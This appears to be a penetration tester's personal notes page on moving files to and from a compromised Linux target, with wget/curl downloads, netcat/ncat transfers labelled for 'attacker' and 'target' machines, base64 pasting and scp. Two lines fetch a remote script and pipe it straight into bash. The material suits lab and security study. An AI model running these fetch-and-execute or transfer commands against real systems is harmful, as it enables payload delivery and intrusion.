☠️ ζHUB

Linux File Transfer

Created: Feb 24, 2025
Updated: Mar 08, 2025

Checksum

A checksum is a unique value used to check if a file is unchanged. It helps detect errors or tampering.

# Checksum using MD5
md5sum test.txt
 
# Checksum using SHA1
sha1sum test.txt

Copy/Paste Base64

# Decode Base64 string and save it into Linux target
echo -n 'SGVsbG8sV29ybGQhCg==' | base64 -d > test.txt

Bash Web Downloads

# Download a file into disk
wget http://$IP/test.txt -O /tmp/test.txt
 
# Download a file in memory 
wget -qO- http://$IP/test.sh | bash
 
# Download a file into disk
curl -o /tmp/test.txt http://$IP/test.txt
 
# Download a file in memory 
curl http://$IP/test.sh | bash

Warning

Some payloads, like mkfifo, write files to disk. Even if execution is fileless using a pipe, certain payloads may still create temporary files on the system.

Living off The Land

Living off the land” was first used by Christopher Campbell @obscuresec and Matt Graeber @mattifestation at DerbyCon 3. The term LOLBins (Living off the Land Binaries) originated from a Twitter discussion about binaries that attackers can misuse for unintended actions.

Link to original

On Linux, we can use the GTFOBins website to search for binaries that perform various functions. To find binaries for downloading or uploading files, use the +file download or +file upload operators.

Netcat

Netcat or nc utility is used for just about anything under the sun involving TCP or UDP.

Link to original

# Listen on port 8000 and save incoming data to a file (Target machine)
nc -lp 8000 > /tmp/test.txt
 
# Send a file to the target machine using netcat (Attacker machine)
nc -q 0 $IP 8000 < /tmp/test.txt

Ncat

Ncat is a feature-packed networking utility which reads and writes data across networks from the command line

# Listen on port 8000 and save incoming data to a file (Target machine)
ncat -lp 8000 --recv-only > /tmp/test.txt
 
# Send a file to the target machine using netcat (Attacker machine)
ncat --send-only $IP 8000 < /tmp/test.txt

SSH Downloads

The Secure Shell Protocol (SSH) is a cryptographic network protocol for operating network services securely over an unsecured network. Its most notable applications are remote login and command-line execution.

Link to original

SCP (secure copy) is a command-line utility that allows you to copy files and directories between two hosts securely.

# Download file from target
scp root@$IP:/tmp/test.txt .

Backlinks

  • No backlinks found